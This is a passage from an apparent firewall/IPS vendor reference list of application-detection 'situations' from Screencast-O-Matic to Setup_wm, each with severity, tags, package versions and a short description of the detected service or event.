About this situation: Application Screencast-O-Matic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Screencast-o-matic is an online screen recorder for one-click recording.
Back to top

ScreenConnect

About this situation: Application ScreenConnect detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ScreenConnect allow connect to your users quickly and easily with fully functional remote support.
Back to top

ScreenSteps

About this situation: Application ScreenSteps detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ScreenSteps provide suite of products that help technology companies communicate more clearly with their customers through the use of desktop and online tools.
Back to top

Scribd

About this situation: Scribd usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1706-5242
Description: Scribd is a digital documents library that allows users to publish, discover and discuss original writings and documents in various languages.
Back to top

SCRIM

About this situation: Application SCRIM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SCRIM is an health and safety management system based on Microsoft dynamics.
Back to top

ScrumDo

About this situation: Application ScrumDo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ScrumDo is an online Scrum, Kanban and Scrumban project management tool.
Back to top

SDK.Finance

About this situation: Application SDK.Finance detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SDK.Finance delivers Back-end-as-a-Service platform for FinTech companies.
Back to top

SDL

About this situation: Application SDL detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SDL allows companies to optimize their customers experience across the entire buyer journey, through its web content management, analytics, social intelligence, campaign management and translation services.
Back to top

SDS-Vault

About this situation: Application SDS-Vault detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Safety Data Sheet
Back to top

SDSC-Cloud

About this situation: Application SDSC-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SDSC's Cloud Storage - store, share, and archive data, including extremely large data sets.
Back to top

SeaCloud

About this situation: Application SeaCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SeaCloud is a place for managing your documents with team members.
Back to top

Seambox

About this situation: Application Seambox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Seambox is an Online CRM Solution.
Back to top

SeamlessDocs

About this situation: Application SeamlessDocs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SeamlessDocs is the way to completely get rid of paperwork using our online documents, forms, and eSignatures. Upload any PDF to convert it into an online form that can be completed and eSigned from any device. Once completed, all docs are stored on a secure cloud so you have access to them anytime, anywhere.
Back to top

Search Engines and Portals

About this situation: Sites that support searching the web, news groups or indices or directories thereof.
Context: URL Application Context
Severity: 1
Tags: Information Technology, Business Usage
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that support searching the web, news groups or indices or directories thereof.
Back to top

Searchfuse

About this situation: Application Searchfuse detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Searchfuse combines all the best SEO tools to manage, organize, monitor and report SEO campaign into one easy to access web application.
Back to top

Searchmetrics

About this situation: Searchmetrics usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Searchmetrics is the pioneer and leading global enterprise platform for international SEO.
Back to top

Seattle-Clouds

About this situation: Application Seattle-Clouds detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SeattleCloud's cloud service helps customers create professional iPhone and Android applications by taking advantage of cutting-edge technologies.
Back to top

SEC-Professionals-Group

About this situation: Application SEC-Professionals-Group detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The SEC Professionals Group is a community of professionals who actively prepare and file financial reports with the U.S. Securities and Exchange Commission.
Back to top

Second-Life

About this situation: Second Life network traffic detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-524-5211
Last changed: sgpkg-ips-1511-5242
Description: Second Life (SL) is a virtual world developed by Linden Lab that launched on June 23, 2003 and is accessiblevia the Internet.
Back to top

Secret

About this situation: Secret usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-648-5211
Description: Secret is an iOS and Android app that allows people to share messages anonymously within their circle of friends and publicly.
Back to top

SecureAuth

About this situation: Application SecureAuth detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SecureAuth provides a single secured access for mobile devices, cloud applications and networks.
Back to top

SecureDocs-Virtual-Data-Room

About this situation: Application SecureDocs-Virtual-Data-Room detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SecureDocs is a highly secure, virtual data room used to store and share sensitive company documents with parties, both internally and externally, during critical transactions such as fundraising, MA, licensing deals, audits, strategic partnerships, legal events, and more.
Back to top

SecurePlan

About this situation: Application SecurePlan detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SecurePlan.com is a free service included with Business Plan Pro and Sales and Marketing Pro, the popular business planning and marketing planning software.
Back to top

SecureSafe

About this situation: Application SecureSafe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Securesafe offers independent advice to domestic and commercial clients on all aspects of security cash safes, security cabinets, fireproof document safes, fireproof data safes, key cabinets and time and attendance solutions.
Back to top

Secureserver-Webmail

About this situation: Secureserver WebMail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web based mail service.
Back to top

SecureSync

About this situation: Application SecureSync detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SecureSync is a proprietary Web-based tape management application software for backup operations and disaster recovery programs.
Back to top

Security

About this situation: Forcepoint Security Filtering adds extra protection from web-based threats by providing additional security-related website categories. These allow you to develop policies to block access to sites associated with spyware, phishing, keylogging and malicious mobile code.
Context: URL Application Context
Severity: 1
Tags: Security, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Forcepoint Security Filtering adds extra protection from web-based threats by providing additional security-related website categories. These allow you to develop policies to block access to sites associated with spyware, phishing, keylogging and malicious mobile code.
Back to top

Securstore

About this situation: Application Securstore detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Securstore's online cloud backup solution offers deployed data backup solutions and recovery services for UK and US clients.
Back to top

SecuTransfer-Professional-Edition

About this situation: Application SecuTransfer-Professional-Edition detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SecuTransfer Professional Edition provides real end-to-end encrypted managed file transfer and collaboration for professionals. The easy to use Outlook plug-in and FTAPI Submitbox allow you to safely send and receive confidential files.
Back to top

Sedlauncher

About this situation: Endpoint Context Agent based Sedlauncher detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1180-5242
Last changed: sgpkg-ips-1180-5242
Description: A network connection initiated by Sedlauncher was detected. Sedlauncher is a tool by Microsoft which protects and improves the speed of Windows Update.
Back to top

Sedo

About this situation: Application Sedo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sedo is a website marketplace that supplies performance based marketing solutions.
Back to top

Seeburger

About this situation: Application Seeburger detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SEEBURGER is a provider of business integration solutions that streamline business processes, reduce operational costs, facilitate governance and compliance, and provide visibility to the farthest edges of the supply chain to maximize ERP effectiveness and drive new efficiencies.
Back to top

Seedpeer

About this situation: Seedpeer usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

SEEK

About this situation: Application SEEK detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SEEK is jobs site that helps find work or recruit the candidate.
Back to top

Seeqpod

About this situation: SeeqPod usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: SeeqPod is intended for finding and indexing playable search results including audio, video, podcasts and Wikipedia articles. Source: Wikipedia
Back to top

Seesmic-Web

About this situation: Seesmic web usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This application allows users to manage user accounts for multiple social networks. Source: Wikipedia
Back to top

Segment

About this situation: Application Segment detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Segment is a startup building platform for collecting customer data, provides a single API to track customer data and send it to tools, internal systems, or a SQL database with the flip of a switch.
Back to top

Seismic

About this situation: Application Seismic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Seismic is sales enablement solution that allows sales teams to deliver the right content at the right time on any device.
Back to top

SekiNdo

About this situation: SekiNdo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: SekiNdo is an advertising network.
Back to top

Selectica-CLM

About this situation: Application Selectica-CLM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Selectica Contract Lifecycle Management streamlines contract processes, from request, authoring, negotiation, and approval through ongoing obligations management, analysis, reporting, and renewals.
Back to top

SelfStir.com

About this situation: Application SelfStir.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SelfStir is a 360 feedback and self assessment tool to help individuals and businesses develop leadership competencies in a connected environment. The system incorporates survey tools, action planning, journaling, peer to peer sharing and a knowledge forum.
Back to top

Self_Test-Cryptography-Fail

About this situation: Self Test of Cryptography module failed.
Context: Self Test without parameters
Severity: 8
Tags: Obsolete
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Self test execution of cryptography modules ended with failure.
Back to top

Self_Test-Cryptography-Success

About this situation: Self Test of cryptography module succeed.
Context: Self Test without parameters
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Self test execution of cryptography modules ended successfully.
Back to top

Self_Test-Fail

About this situation: Self Test failed.
Context: Self Test without parameters
Severity: 8
Tags: Obsolete
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Self test execution ended with failure.
Back to top

Self_Test-Success

About this situation: Self Test succeed.
Context: Self Test without parameters
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Self test execution ended successfully.
Back to top

SellerVantage

About this situation: Application SellerVantage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SellerVantage is a multi-channel inventory management software. This web-based solution manages sales across eBay, Amazon, Craigslist and eCommerce websites.
Back to top

Selligent

About this situation: Application Selligent detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Selligent is a software provider in conversion marketing and interactive CRM solutions. They offer solutions for the challenges and opportunities that companies face in transforming themselves into customer-driven organizations. They customer interaction solutions enable organizations to engage with customers as individuals, in a one to one cross channel relationships.
Back to top

Sellsy

About this situation: Application Sellsy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sellsy - CRM, invoicing and sales management for agiles companies.
Back to top

Sem.-Project-Timer

About this situation: Application Sem.-Project-Timer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sem. Project Timer lets you to create projects, define related tasks and easily share them with your employees.
Back to top

Semba-Mobile

About this situation: Application Semba-Mobile detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SEMBA is a ready-made, template driven mobile commerce platform for IOS and Android.
Back to top

Send-Anywhere

About this situation: Send Anywhere usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Send Anywhere works by creating a temporary six digit and QR code which recipients can use to access files sent to them, so long as they download the files within a ten minute time frame.
Back to top

Send-Invoice

About this situation: Application Send-Invoice detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Send Invoice is web-based billing software.
Back to top

Send2Fax

About this situation: Application Send2Fax detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Send2Fax online solution enabling you to send and receive faxes while saving time, money, and paper.
Back to top

Send6

About this situation: Send6 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Send6 is a leading digital delivery company serving both businesses and Individuals with innovative technology. Send6 enables users to send, track and receive files.
Back to top

SendAnywhere

About this situation: SendAnywhere usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-663-5211
Last changed: sgpkg-ips-663-5211
Description: SendAnywhere is a multi-platform file transferring and file sharing service. The service can be accessed through a client application for Windows desktop, Mac OS, Android, iOS and Windows phone.
Back to top

SenderScore

About this situation: Application SenderScore detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sender Score is an indication of the trustworthiness of an email source.
Back to top

SendGrid

About this situation: SendGrid usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-599-5211
Description: SendGrid is email delivery service.
Back to top

Sendible

About this situation: Application Sendible detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sendible is a social media management, monitoring and analytics platform that helps companies manage their social media presence more efficiently.
Back to top

Sendicate

About this situation: Application Sendicate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sendicate is an email publishing application for newsletters and email marketing
Back to top

SendinBlue

About this situation: Application SendinBlue detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SendinBlue is an Email Marketing solution to send Newsletters, Bulk Emails, Transactional Emails, SMS Marketing and Marketing Automation.
Back to top

SendItOnTheNet

About this situation: Application SendItOnTheNet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Senditonthenet is secure file transfer and sharing service, client side encryption ensures your privacy.
Back to top

Sendloop

About this situation: Application Sendloop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sendloop lets to create email marketing and beautiful HTML email campaigns easily.
Back to top

SendOutCards

About this situation: Application SendOutCards detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SendOutCards is enabling people to send cards and gifts by providing an online service.
Back to top

Sendpepper

About this situation: Application Sendpepper detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SendPepper is the latest product from the creators of OfficeAutopilot.com, the leading web-based sales, marketing and business automation software for growing companies.
Back to top

SendSpace

About this situation: SendSpace usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-679-5211
Description: SendSpace (www.sendspace.com) is a file hosting website. It offers temporary file hosting to enable users to send and receive large files that are too big for email attachments.
Back to top

Sendthisfile

About this situation: SendThisFile usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: SendThisFile is a file transfer service that uses Internet to modernize and simplify sending and receiving large files. It transfers include our comprehensive encryption and security, creating end-to-end 128-bit encrypted file transfers without having to configure a single setting.
Back to top

Senior.com

About this situation: Application Senior.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Senior.com is the resource for information, products, and services focused on meeting the needs of seniors and those serving seniors in communities. It is provides an environment where members and visitors can communicate with family and friends, research information relevant to daily lives, share stories and experiences and purchase products and services safely.
Back to top

SensioLabs-Connect

About this situation: Application SensioLabs-Connect detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SensioLabs Connect is a developer social network.
Back to top

Sent-SMS

About this situation: Application Sent-SMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sent.ly provides cloud computing-based sms systems to help businesses and organizations to stay in touch with their customers. Sent.ly focus is on e-commerce, logistics and marketing in South East Asia.
Back to top

Sentry

About this situation: Application Sentry detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sentry is an event logging platform primarily focused on capturing and aggregating exceptions.
Back to top

Sentry-EHS

About this situation: Application Sentry-EHS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sentry EHS is a cloud-based software solution that helps companies maintain compliance with environmental, health and safety
Back to top

Sentry.io

About this situation: Sentry.io usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-1676-5242
Last changed: sgpkg-ips-1769-5242
Description: Sentry.io is an application monitoring platform.
Back to top

SEOshop-webshop-software

About this situation: Application SEOshop-webshop-software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SEOshop is a hosted e-Commerce solution that allows you to set up and run your own online store.
Back to top

SEP-Networks

About this situation: Application SEP-Networks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SEP Networks has developed NetGen, the Net-Generation of On-Demand Digital Marketing and Asset Management Software for the Franchise and Direct Selling Industries. NetGen is comprised of brand compliance functionalities that empower companies to optimize all aspects of digital marketing while delivering a powerful suite of on demand business building tools to their network. In addition, NetGen offers capabilities that allow it to meet multi-lingual requirements.
Back to top

Sequence-Enterprise

About this situation: Application Sequence-Enterprise detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sequence Enterprise allows companies doing manual assembly to author, review, approve, deploy and validate the work instructions required to build products.
Back to top

Serena

About this situation: Application Serena detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Serena Software provides solutions that orchestrate application delivery, IT service management, IT operations and business processes for the Global 2000.
Back to top

SerGroup

About this situation: Application SerGroup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SerGroup provides Enterprise Content Management software
Back to top

Sertifi

About this situation: Application Sertifi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sertifi is a provider of frictionless business, with solutions for modernizing of the sales process. Sertifi offers secure way to close business, from eSignatures to online payment capture.
Back to top

ServCorp

About this situation: Application ServCorp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Servcrop provides management of virtual and executive suites through its online service Servcorp Online which helps business gain access to corporate boardrooms, meeting rooms and office space, book resources for any Servcorp location, online and in real time internationally.
Back to top

Server-Density

About this situation: Application Server-Density detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ServerDensity provides premium hosted website, cloud management and worldwide server monitoring with millions of metrics.
Back to top

Server-Intellect

About this situation: Application Server-Intellect detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Server Intellect delivers fully managed dedicated hosting and cloud computing solutions to customers all over the world.
Back to top

Service and Philanthropic Organizations

About this situation: Sites sponsored by or that support or offer information about organizations devoted to doing good as their primary activity.
Context: URL Application Context
Severity: 1
Tags: Social Organizations, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by or that support or offer information about organizations devoted to doing good as their primary activity.
Back to top

ServiceLink

About this situation: Application ServiceLink detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: ServiceLink is a mortgage services company that helps clients in the lending industry achieve their strategic goals and better serve their customers.
Back to top

Servicem8

About this situation: serviceM8 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: ServiceM8 (Service Mate) is a cloud-based Software-as-a-Service (SAAS) application that allows you to simply manage any service business. It will guide you from job quoting (or job estimates) right through to invoicing and payment. You will have real-time information on what jobs are currently active, what quotes have been issued to clients, and where and when staff are at client sites.
Back to top

Servicemax

About this situation: ServiceMax usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: ServiceMax manage contracts, scheduling, and parts, while also providing solutions for social, portals, and analytics.
Back to top

ServiceNow

About this situation: ServiceNow usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-641-5211
Last changed: sgpkg-ips-1764-5242
Description: ServiceNow is a platform as a service provider offering various applications to businesses such as project management, IT service management and more. The service is offered through the URL https://www.servicenow.com.
Back to top

ServicePattern

About this situation: Application ServicePattern detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bright Pattern helps manage the complete life-cycle of customer experience. Architected from the ground up as a cloud-based service, Bright Pattern offers the right blend of enterprise-grade functionality, reliability, and scalability not available from anyone else in the industry.
Back to top

Servicepower

About this situation: Application Servicepower detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ServicePower provider of software and services in field service and workforce management. ServicePower provide solutions for both staff and 3rd party workforces majoring on workforce planning, customer service, automated scheduling and dispatch, mobile worker, warranty labor
Back to top

ServiceSource

About this situation: Application ServiceSource detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ServiceSource cloud-based recurring revenue management solutions helps customers drive growth and build long-standing relationships across the customer lifecycle with the industry's most comprehensive data management, analytics, automation and services capabilities.
Back to top

Servimg.com

About this situation: Application Servimg.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Servimg.com is image hosting service.
Back to top

Servus

About this situation: Application Servus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SERVUS is a mobile app for commercial real estate property management firms to take control of their service activity and stop juggling text, email and voicemails.
Back to top

Session-Duplicate-Mac

About this situation: VPN client from different user with identical MAC
Context: Firewall Events
Severity: 4
Tags: VPN
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Description: A VPN client connected with an identical MAC which previously belonged to another user. Possible VPN client configuration error.
Back to top

SessionCam

About this situation: Application SessionCam detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ServiceTick is Customer Experience Management company that is focused on transforming customer feedback and online behaviour into profit.
Back to top

SetMore-Appointments

About this situation: Application SetMore-Appointments detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SetMore is a online appointment calendar software which helps you book and manage appointments and much more via its simple Web, Android and iOS apps.
Back to top

Setster

About this situation: Application Setster detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Setster is a web-based application that gives service providers and teams of professionals the ability to accept appointments online using a widget that can be embedded on any website. Service providers can manage their online calendars and appointment books in a very simple and intuitive user interface, while allowing their clients access to their availability.
Back to top

Settings Synchronization

About this situation: Endpoint Context Agent based Settings Synchronization detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Description: Microsoft Windows Settings Synchronization endpoint application was detected. Settings Synchronization syncronizes various settings and configuration data between devices.
Back to top

Setup_wm

About this situation: Endpoint Context Agent based setup_wm.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
